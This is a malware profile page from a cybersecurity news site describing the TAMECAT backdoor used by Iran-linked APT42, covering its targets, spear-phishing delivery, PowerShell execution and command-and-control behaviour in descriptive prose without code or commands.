Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

Tamecat (Backdoor) – Malware

July 12, 2024
Reading Time: 3 mins read
in Malware
Tamecat (Backdoor) – Malware

Tamecat

Type of Malware

Backdoor

Country of Origin

Iran

Date of initial activity

March 2024

Targeted Countries

Regions of interest to Iran

Associated Groups

APT42

Motivation

Cybercriminals may use TAMECAT to access files, directories, applications, and more. With this access, threat actors can extract a wide range of sensitive information, including personal data, financial records, login credentials, and other valuable data. Additionally, threat actors may use TAMECAT to inject additional malware into the compromised systems.

Attack Vectors

Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.

Tools

ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers

Targeted System

Windows

Overview

In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold capable of executing arbitrary PowerShell or C# content. TAMECAT is delivered by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT being used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations worldwide.

Targets

Credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran. Individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world

How they operate

APT42 utilizes two custom backdoors named Nicecurl and Tamecat, each designed for specific functions within cyberespionage operations. The attack begins with emails from online personas posing as journalists, NGO representatives, or event organizers, sent from domains that “typosquat” (use similar URLs) to those of legitimate organizations. TAMECAT is delivered with decoy content, likely via spear phishing, providing APT42 operators with initial access to the targets. The backdoor offers a flexible code-execution interface, which can be used as a jumping-off point to deploy additional malware or manually execute commands on the device. TAMECAT is dropped by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Execution begins with a small VBScript downloader that leverages Windows Management Instrumentation (WMI) to query anti-virus products running on the victim’s system. Depending on whether the script detects Windows Defender, different download commands and URLs are used.
References:
  • Uncharmed: Untangling Iran’s APT42 Operations
  • How to remove TAMECAT malware from infected computers
Tags: APT42BackdoorBase64EmailsGovernmentsHTTPintergovernmental organizationsIranJournalistsMalwareMandiantNGOsPhishingPowerShellTamecatWindows
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

New ZeroCrumb Malware Steals Browser Cookies

TikTok Videos Spread Vidar StealC Malware

CISA Commvault ZeroDay Flaw Risks Secrets

GitLab Patch Stops Service Disruption Risks

3AM Ransomware Email Bomb and Vishing Threat

Function Confusion Hits Serverless Clouds

Subscribe to our newsletter

    Latest Incidents

    Cetus Crypto Exchange Hacked For $223M

    MCP Data Breach Hits 235K NC Lab Patients

    UFCW Data Breach Risks Social Security Data

    Cyberattack Paralyzes French Hauts de Seine

    Santa Fe City Loses $324K In Hacker Scam

    Belgium Housing Hit by Ransomware Attack

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial